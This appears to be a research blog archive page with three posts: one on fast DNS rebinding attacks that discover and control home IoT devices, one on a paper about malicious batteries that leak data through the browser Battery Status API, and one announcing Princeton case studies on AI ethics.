June 23, 2018

Archives for 2018

Fast Web-based Attacks to Discover and Control IoT Devices

By Gunes Acar, Danny Y. Huang, Frank Li, Arvind Narayanan, and Nick Feamster

Two web-based attacks against IoT devices made the rounds this week. Researchers Craig Young and Brannon Dorsey showed that a well known attack technique called “DNS rebinding” can be used to control your smart thermostat, detect your home address or extract unique identifiers from your IoT devices.

For this type of attack to work, a user needs to visit a web page that contains malicious script and remain on the page while the attack proceeds. The attack simply fails if the user navigates away before the attack completes. According to the demo videos, each of these attacks takes longer than a minute to finish, assuming the attacker already knew the IP address of the targeted IoT device.

According to a study by Chartbeat, however, 55% of typical web users spent fewer than 15 seconds actively on a page. Does it mean that most web users are immune to these attacks?

In a paper to be presented at ACM SIGCOMM 2018 Workshop on IoT Security and Privacy, we developed a much faster version of this attack that takes only around ten seconds to discover and attack local IoT devices. Furthermore, our version assumes that the attacker has no prior knowledge of the targeted IoT device’s IP address. Check out our demo video below.

[Read more…]

Exfiltrating data from the browser using battery discharge information

Modern batteries are powerful – indeed they are smart, and have a privileged position enabling them to sense device utilization patterns. A recent research paper has identified a potential threat: researchers (from Technion, University of Texas Austin, Hebrew University) devise a scenario where malicious batteries are supplied to user devices (e.g. via compromised supply chains):

An attacker with brief physical access to the mobile device – at the supply chain, repair shops, workplaces, etc. – can replace the device’s battery. This is an example of an interdiction attack. Interdiction attacks using malicious VGA cables have been used to snoop on targeted users. Malicious battery introduces a new attack vector into a mobile device.

Poisoned batteries are thus capable of monitoring the victim’s system use, leading to the recovery of sensitive user information, such as: visited websites (with around 65% precision, better than a random guess), typed characters (accuracy better than random guess), when a camera shot is made, and incoming calls. Detection of the sensitive user data is an example of power analysis, exploiting a side channel information leak. Finally, the battery is also used to exfiltrate information to the attackers.

The whole attack is rather technically complex, and it is subject to debate how practical it could be to real-world attackers at this moment. But it is nonetheless very interesting, as it highlights how complex our computing devices really are, and that there is an inherent need to trust the components of our devices.

I’d like to call special attention to the exfiltration channel using the battery. It is a very interesting covert channel.

The W3C Battery Status API, implemented by major web browsers, notably Chrome, allows websites to query the information about the current battery level, as well as to disclose the rate of charge/discharge. The paper describes an exploitation of the Battery Status API in order to remotely exfiltrate acquired data. All the victim user has to do is to visit a sink website that is reading the data. Malicious batteries can detect when the browser enters this special website, and enable the exfiltration mode.

And how is the exfiltration done? It works by manipulating of “charging” states – the 0/1 state informing a website that the battery is either charging or discharging. But how to induce a steady stream of “charging” event changes in a way that encodes information? The employed technique is very interesting: it uses wireless charging, i.e. by placing a resonant inductive charger into the battery chip. What needs to be done is to place a charging coil close to the battery hardware.

Sounds complicated? It does not need to be, since we assume that an attacker is able to deliver a malicious battery in the first place. Then all the user has to do is to visit a website that would read the information using the standard W3C Battery Status API, when supported by the web browser (e.g.. Chrome is vulnerable but Firefox is immune). In principle, everything is done without any interaction with the Operating System – it is oblivious to the OS.

There is also this interesting observation:

Since the browser does not seem to limit the update rate, the state change depends entirely on the phone’s software and the charging pad state transition rate. We find that the time to detect the transition from not charging to charging (Tdc) is 3.9 seconds.

This allows the attacker to obtain a covert channel with a bandwidth of 0.1-0.5 bits/second. Of course there is no reason for browsers to allow frequent switches between charge/discharge events. So the Privacy by Design methodology here would be to cap the switch rate.

The attack may seem like a stretch (requires physical battery replacement – or poisoning hardware at a factory), and at this moment one can imagine multiple simpler methods. Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.

For more information, please see the paper here.

For more information about the privacy by design case study of the Battery Status API, see here.

Princeton Dialogues of AI and Ethics: Launching case studies

Summary: We are releasing four case studies on AI and ethics, as part of the Princeton Dialogues on AI and Ethics.

The impacts of rapid developments in artificial intelligence (“AI”) on society—both real and not yet realized—raise deep and pressing questions about our philosophical ideals and institutional arrangements. AI is currently applied in a wide range of fields—such as medical diagnosis, criminal sentencing, online content moderation, and public resource management—but it is only just beginning to realize its potential to influence practically all areas of human life, including geopolitical power balances. As these technologies advance and increasingly come to mediate our everyday lives, it becomes necessary to consider how they may reflect prevailing philosophical perspectives and preferences. We must also assess how the architectural design of AI technologies today might influence human values in the future. This step is essential in order to identify the positive opportunities presented by AI and unleash these technologies’ capabilities in the most socially advantageous way possible while being mindful of potential harms. Critics question the extent to which individual engineers and proprietors of AI should take responsibility for the direction of these developments, or whether centralized policies are needed to steer growth and incentives in the right direction. What even is the right direction? How can it be best achieved?

Princeton’s University Center for Human Values (UCHV) and the Center for Information Technology Policy (CITP) are excited to announce a joint research project, “The Princeton Dialogues on AI and Ethics,” in the emerging field of artificial intelligence (broadly defined) and its interaction with ethics and political theory. The aim of this project is to develop a set of intellectual reasoning tools to guide practitioners and policy makers, both current and future, in developing the ethical frameworks that will ultimately underpin their technical and legislative decisions. More than ever before, individual-level engineering choices are poised to impact the course of our societies and human values. And yet there have been limited opportunities for AI technology actors, academics, and policy makers to come together to discuss these outcomes and their broader social implications in a systematic fashion. This project aims to provide such opportunities for interdisciplinary discussion, as well as in-depth reflection.

We convened two invitation-only workshops in October 2017 and March 2018, in which philosophers, political theorists, and machine learning experts met to assess several real-world case studies that elucidate common ethical dilemmas in the field of AI. The aim of these workshops was to facilitate a collaborative learning experience which enabled participants to dive deeply into the ethical considerations that ought to guide decision-making at the engineering level and highlight the social shifts they may be affecting. The first outcomes of these deliberations have now been published in the form of case studies. To access these educational materials, please see our dedicated website https://aiethics.princeton.edu. These cases are intended for use across university departments and in corporate training in order to equip the next generation of engineers, managers, lawyers, and policy makers with a common set of reasoning tools for working on AI governance and development.

In March 2018, we also hosted a public conference, titled “AI & Ethics,” where interested academics, policy makers, civil society advocates, and private sector representatives from diverse fields came to Princeton to discuss topics related to the development and governance of AI: “International Dimensions of AI” and “AI and Its Democratic Frontiers”. This conference sought to use the ethics and engineering knowledge foundations developed through the initial case studies to inspire discussion on AI technology’s wider social effects.

This project is part of a wider effort at Princeton University to investigate the intersection between AI technology, politics, and philosophy. There is a particular emphasis on the ways in which the interconnected forces of technology and its governance simultaneously influence and are influenced by the broader social structures in which they are situated. The Princeton Dialogues on AI and Ethics makes use of the university’s exceptional strengths in computer science, public policy, and philosophy. The project also seeks opportunities for cooperation with existing projects in and outside of academia.